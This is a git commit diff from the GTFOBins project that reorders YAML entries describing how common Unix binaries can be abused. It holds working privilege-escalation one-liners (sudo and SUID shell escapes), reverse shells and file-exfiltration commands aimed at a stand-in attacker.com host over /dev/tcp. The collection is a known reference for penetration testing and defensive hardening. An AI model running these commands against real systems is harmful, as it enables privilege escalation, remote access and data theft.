mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Reorder functions in binaries
This commit is contained in:
parent
80b20b6991
commit
d6895f367d
@ -2,12 +2,12 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: ash
|
- code: ash
|
||||||
sudo-enabled:
|
|
||||||
- code: sudo ash
|
|
||||||
suid-enabled:
|
|
||||||
- code: ./ash
|
|
||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
export LFILE=file_to_write
|
export LFILE=file_to_write
|
||||||
ash -c 'echo data > $LFILE'
|
ash -c 'echo data > $LFILE'
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./ash"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo ash
|
||||||
---
|
---
|
||||||
|
@ -2,10 +2,6 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||||
sudo-enabled:
|
|
||||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
|
||||||
suid-limited:
|
|
||||||
- code: ./awk 'BEGIN {system("/bin/sh")}'
|
|
||||||
reverse-shell-non-interactive:
|
reverse-shell-non-interactive:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
@ -23,12 +19,16 @@ functions:
|
|||||||
s = "/inet/tcp/" LPORT "/0/0";
|
s = "/inet/tcp/" LPORT "/0/0";
|
||||||
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
||||||
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
||||||
file-read:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
awk '//' "$LFILE"
|
|
||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
|
awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
|
||||||
|
file-read:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
awk '//' "$LFILE"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||||
|
suid-limited:
|
||||||
|
- code: ./awk 'BEGIN {system("/bin/sh")}'
|
||||||
---
|
---
|
||||||
|
@ -1,15 +1,15 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
sudo base64 "$LFILE" | base64 --decode
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./base64 "$LFILE" | base64 --decode
|
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
base64 "$LFILE" | base64 --decode
|
base64 "$LFILE" | base64 --decode
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./base64 "$LFILE" | base64 --decode
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo base64 "$LFILE" | base64 --decode
|
||||||
---
|
---
|
||||||
|
@ -2,18 +2,22 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: bash
|
- code: bash
|
||||||
sudo-enabled:
|
reverse-shell-interactive:
|
||||||
- code: sudo bash
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
suid-enabled:
|
code: |
|
||||||
- code: ./bash -p
|
export RHOST=attacker.com
|
||||||
|
export RPORT=12345
|
||||||
|
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
|
||||||
upload:
|
upload:
|
||||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
- description: Send local file in the body of an HTTP POST request. Run an HTTP
|
||||||
|
service on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
export LFILE=file_to_send
|
export LFILE=file_to_send
|
||||||
bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
||||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
|
||||||
|
on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
@ -28,25 +32,24 @@ functions:
|
|||||||
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
|
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
|
||||||
3<>/dev/tcp/$RHOST/$RPORT \
|
3<>/dev/tcp/$RHOST/$RPORT \
|
||||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
|
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
|
||||||
|
on the attacker box to send the file.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
export LFILE=file_to_get
|
export LFILE=file_to_get
|
||||||
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
||||||
reverse-shell-interactive:
|
file-write:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- code: |
|
||||||
code: |
|
export LFILE=file_to_write
|
||||||
export RHOST=attacker.com
|
bash -c 'echo data > $LFILE'
|
||||||
export RPORT=12345
|
|
||||||
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
|
|
||||||
file-read:
|
file-read:
|
||||||
- description: It trims trailing newlines and it's not binary-safe.
|
- description: It trims trailing newlines and it's not binary-safe.
|
||||||
code: |
|
code: |
|
||||||
export LFILE=file_to_read
|
export LFILE=file_to_read
|
||||||
bash -c 'echo "$(<$LFILE)"'
|
bash -c 'echo "$(<$LFILE)"'
|
||||||
file-write:
|
suid-enabled:
|
||||||
- code: |
|
- code: "./bash -p"
|
||||||
export LFILE=file_to_write
|
sudo-enabled:
|
||||||
bash -c 'echo data > $LFILE'
|
- code: sudo bash
|
||||||
---
|
---
|
||||||
|
@ -5,22 +5,23 @@ description: |
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: busybox sh
|
- code: busybox sh
|
||||||
sudo-enabled:
|
|
||||||
- code: sudo busybox sh
|
|
||||||
suid-enabled:
|
|
||||||
- description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
|
|
||||||
code: ./busybox sh
|
|
||||||
file-read:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./busybox cat "$LFILE"
|
|
||||||
file-write:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_write
|
|
||||||
busybox sh -c 'echo "data" > $LFILE'
|
|
||||||
upload:
|
upload:
|
||||||
- description: Serve files in the local folder running an HTTP server.
|
- description: Serve files in the local folder running an HTTP server.
|
||||||
code: |
|
code: |
|
||||||
export LPORT=12345
|
export LPORT=12345
|
||||||
busybox httpd -f -p $LPORT -h .
|
busybox httpd -f -p $LPORT -h .
|
||||||
|
file-write:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_write
|
||||||
|
busybox sh -c 'echo "data" > $LFILE'
|
||||||
|
file-read:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./busybox cat "$LFILE"
|
||||||
|
suid-enabled:
|
||||||
|
- description: It may drop the SUID privileges depending on the compilation flags
|
||||||
|
and the runtime configuration.
|
||||||
|
code: "./busybox sh"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo busybox sh
|
||||||
---
|
---
|
||||||
|
@ -1,15 +1,15 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
sudo cat "$LFILE"
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./cat "$LFILE"
|
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
cat "$LFILE"
|
cat "$LFILE"
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./cat "$LFILE"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo cat "$LFILE"
|
||||||
---
|
---
|
||||||
|
@ -2,12 +2,12 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: csh
|
- code: csh
|
||||||
sudo-enabled:
|
|
||||||
- code: sudo csh
|
|
||||||
suid-enabled:
|
|
||||||
- code: ./csh -b
|
|
||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
export LFILE=file_to_write
|
export LFILE=file_to_write
|
||||||
ash -c 'echo data > $LFILE'
|
ash -c 'echo data > $LFILE'
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./csh -b"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo csh
|
||||||
---
|
---
|
||||||
|
@ -1,7 +1,8 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
upload:
|
upload:
|
||||||
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
- description: Send local file with an HTTP POST request. Run an HTTP service on
|
||||||
|
the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
URL=http://attacker.com/
|
URL=http://attacker.com/
|
||||||
LFILE=file_to_send
|
LFILE=file_to_send
|
||||||
|
@ -1,15 +1,15 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
sudo cut -d "" -f1 "$LFILE"
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./cut -d "" -f1 "$LFILE"
|
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
cut -d "" -f1 "$LFILE"
|
cut -d "" -f1 "$LFILE"
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./cut -d "" -f1 "$LFILE"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo cut -d "" -f1 "$LFILE"
|
||||||
---
|
---
|
||||||
|
@ -2,12 +2,12 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: dash
|
- code: dash
|
||||||
sudo-enabled:
|
|
||||||
- code: sudo dash
|
|
||||||
suid-enabled:
|
|
||||||
- code: ./dash -p
|
|
||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
export LFILE=file_to_write
|
export LFILE=file_to_write
|
||||||
ash -c 'echo data > $LFILE'
|
ash -c 'echo data > $LFILE'
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./dash -p"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo dash
|
||||||
---
|
---
|
||||||
|
@ -1,11 +1,11 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
file-read:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
dd if=LFILE
|
|
||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
echo "data" | dd of=$LFILE
|
echo "data" | dd of=$LFILE
|
||||||
|
file-read:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
dd if=LFILE
|
||||||
---
|
---
|
||||||
|
@ -1,15 +1,15 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
sudo diff --line-format=%L /dev/null $LFILE
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./diff --line-format=%L /dev/null $LFILE
|
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
diff --line-format=%L /dev/null $LFILE
|
diff --line-format=%L /dev/null $LFILE
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./diff --line-format=%L /dev/null $LFILE
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo diff --line-format=%L /dev/null $LFILE
|
||||||
---
|
---
|
||||||
|
@ -4,6 +4,14 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
ed
|
ed
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
file-write:
|
||||||
|
- code: |
|
||||||
|
ed file_to_write
|
||||||
|
w
|
||||||
|
file-read:
|
||||||
|
- code: 'ed file_to_read
|
||||||
|
|
||||||
|
'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: |
|
- code: |
|
||||||
sudo ed
|
sudo ed
|
||||||
@ -12,11 +20,4 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
./ed
|
./ed
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
file-read:
|
|
||||||
- code: |
|
|
||||||
ed file_to_read
|
|
||||||
file-write:
|
|
||||||
- code: |
|
|
||||||
ed file_to_write
|
|
||||||
w
|
|
||||||
---
|
---
|
||||||
|
@ -2,15 +2,16 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
||||||
sudo-enabled:
|
|
||||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
|
||||||
suid-enabled:
|
|
||||||
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
|
||||||
file-read:
|
|
||||||
- code: |
|
|
||||||
emacs file_to_read
|
|
||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
emacs file_to_write
|
emacs file_to_write
|
||||||
C-x C-s
|
C-x C-s
|
||||||
|
file-read:
|
||||||
|
- code: 'emacs file_to_read
|
||||||
|
|
||||||
|
'
|
||||||
|
suid-enabled:
|
||||||
|
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,8 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: env /bin/sh
|
- code: env /bin/sh
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./env /bin/sh -p"
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo env /bin/sh
|
- code: sudo env /bin/sh
|
||||||
suid-enabled:
|
|
||||||
- code: ./env /bin/sh -p
|
|
||||||
---
|
---
|
||||||
|
@ -1,17 +1,18 @@
|
|||||||
---
|
---
|
||||||
description: |
|
description: 'The read file content is corrupted by replacing tabs with spaces.
|
||||||
The read file content is corrupted by replacing tabs with spaces.
|
|
||||||
|
'
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
sudo expand "$LFILE"
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./expand "$LFILE"
|
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
expand "$LFILE"
|
expand "$LFILE"
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./expand "$LFILE"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo expand "$LFILE"
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,8 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: expect -c 'spawn /bin/sh;interact'
|
- code: expect -c 'spawn /bin/sh;interact'
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./expect -c 'spawn /bin/sh -p;interact'"
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||||
suid-enabled:
|
|
||||||
- code: ./expect -c 'spawn /bin/sh -p;interact'
|
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,8 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: find . -exec /bin/sh \; -quit
|
- code: find . -exec /bin/sh \; -quit
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./find . -exec /bin/sh -p \\; -quit"
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo find . -exec /bin/sh \; -quit
|
- code: sudo find . -exec /bin/sh \; -quit
|
||||||
suid-enabled:
|
|
||||||
- code: ./find . -exec /bin/sh -p \; -quit
|
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,8 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: flock -u / /bin/sh
|
- code: flock -u / /bin/sh
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./flock -u / /bin/sh -p"
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo flock -u / /bin/sh
|
- code: sudo flock -u / /bin/sh
|
||||||
suid-enabled:
|
|
||||||
- code: ./flock -u / /bin/sh -p
|
|
||||||
---
|
---
|
||||||
|
@ -1,17 +1,18 @@
|
|||||||
---
|
---
|
||||||
description: |
|
description: 'The read file content is not binary-safe.
|
||||||
The read file content is not binary-safe.
|
|
||||||
|
'
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./fmt -pNON_EXISTING_PREFIX "$LFILE"
|
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
fmt -pNON_EXISTING_PREFIX "$LFILE"
|
fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||||
---
|
---
|
||||||
|
@ -1,15 +1,15 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
sudo fold -w99999999 "$LFILE"
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./fold -w99999999 "$LFILE"
|
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
fold -w99999999 "$LFILE"
|
fold -w99999999 "$LFILE"
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./fold -w99999999 "$LFILE"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo fold -w99999999 "$LFILE"
|
||||||
---
|
---
|
||||||
|
@ -4,10 +4,6 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
ftp
|
ftp
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
sudo ftp
|
|
||||||
!/bin/sh
|
|
||||||
upload:
|
upload:
|
||||||
- description: Send local file to a FTP server.
|
- description: Send local file to a FTP server.
|
||||||
code: |
|
code: |
|
||||||
@ -20,4 +16,8 @@ functions:
|
|||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
ftp $RHOST
|
ftp $RHOST
|
||||||
get file_to_get
|
get file_to_get
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
sudo ftp
|
||||||
|
!/bin/sh
|
||||||
---
|
---
|
||||||
|
@ -8,10 +8,10 @@ description: |
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: gdb -nx -ex '!sh' -ex quit
|
- code: gdb -nx -ex '!sh' -ex quit
|
||||||
sudo-enabled:
|
|
||||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
|
||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
|
gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
|
||||||
|
sudo-enabled:
|
||||||
|
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||||
---
|
---
|
||||||
|
@ -1,15 +1,15 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
sudo head -c1G "$LFILE"
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./head -c1G "$LFILE"
|
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
head -c1G "$LFILE"
|
head -c1G "$LFILE"
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./head -c1G "$LFILE"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo head -c1G "$LFILE"
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,8 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: ionice /bin/sh
|
- code: ionice /bin/sh
|
||||||
|
suid-enabled:
|
||||||
|
- code: "./ionice /bin/sh -p"
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo ionice /bin/sh
|
- code: sudo ionice /bin/sh
|
||||||
suid-enabled:
|
|
||||||
- code: ./ionice /bin/sh -p
|
|
||||||
---
|
---
|
||||||
|
@ -1,15 +1,15 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
sudo jq -Rr . "$LFILE"
|
|
||||||
suid-enabled:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./jq -Rr . "$LFILE"
|
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
jq -Rr . "$LFILE"
|
jq -Rr . "$LFILE"
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./jq -Rr . "$LFILE"
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo jq -Rr . "$LFILE"
|
||||||
---
|
---
|
||||||
|
@ -2,18 +2,22 @@
|
|||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: ksh
|
- code: ksh
|
||||||
sudo-enabled:
|
reverse-shell-interactive:
|
||||||
- code: sudo ksh
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
suid-enabled:
|
code: |
|
||||||
- code: ./ksh -p
|
export RHOST=attacker.com
|
||||||
|
export RPORT=12345
|
||||||
|
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
|
||||||
upload:
|
upload:
|
||||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
- description: Send local file in the body of an HTTP POST request. Run an HTTP
|
||||||
|
service on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
export LFILE=file_to_send
|
export LFILE=file_to_send
|
||||||
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
||||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
|
||||||
|
on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
@ -28,18 +32,17 @@ functions:
|
|||||||
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
|
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
|
||||||
3<>/dev/tcp/$RHOST/$RPORT \
|
3<>/dev/tcp/$RHOST/$RPORT \
|
||||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
|
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
|
||||||
|
on the attacker box to send the file.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
export LFILE=file_to_get
|
export LFILE=file_to_get
|
||||||
ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
||||||
reverse-shell-interactive:
|
file-write:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- code: |
|
||||||
code: |
|
export LFILE=file_to_write
|
||||||
export RHOST=attacker.com
|
ksh -c 'echo data > $LFILE'
|
||||||
export RPORT=12345
|
|
||||||
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
|
|
||||||
file-read:
|
file-read:
|
||||||
- description: It trims trailing newlines.
|
- description: It trims trailing newlines.
|
||||||
code: |
|
code: |
|
||||||
@ -49,8 +52,8 @@ functions:
|
|||||||
code: |
|
code: |
|
||||||
export LFILE=file_to_read
|
export LFILE=file_to_read
|
||||||
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
|
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
|
||||||
file-write:
|
suid-enabled:
|
||||||
- code: |
|
- code: "./ksh -p"
|
||||||
export LFILE=file_to_write
|
sudo-enabled:
|
||||||
ksh -c 'echo data > $LFILE'
|
- code: sudo ksh
|
||||||
---
|
---
|
||||||
|
@ -9,9 +9,9 @@ description: |
|
|||||||
```
|
```
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: /lib/ld.so /bin/sh
|
- code: "/lib/ld.so /bin/sh"
|
||||||
|
suid-enabled:
|
||||||
|
